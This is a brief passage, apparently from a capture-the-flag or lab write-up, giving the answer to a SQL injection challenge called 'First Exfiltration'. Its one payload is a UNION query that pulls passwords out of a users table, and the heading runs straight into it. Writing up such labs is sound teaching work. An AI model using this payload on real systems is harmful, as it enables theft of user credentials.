First Exfiltration This one is also straightforward. It's just a basic UNION query. The correct payload is: First exfiltrationadmin' UNION SELECT password,null from users-- - sql injection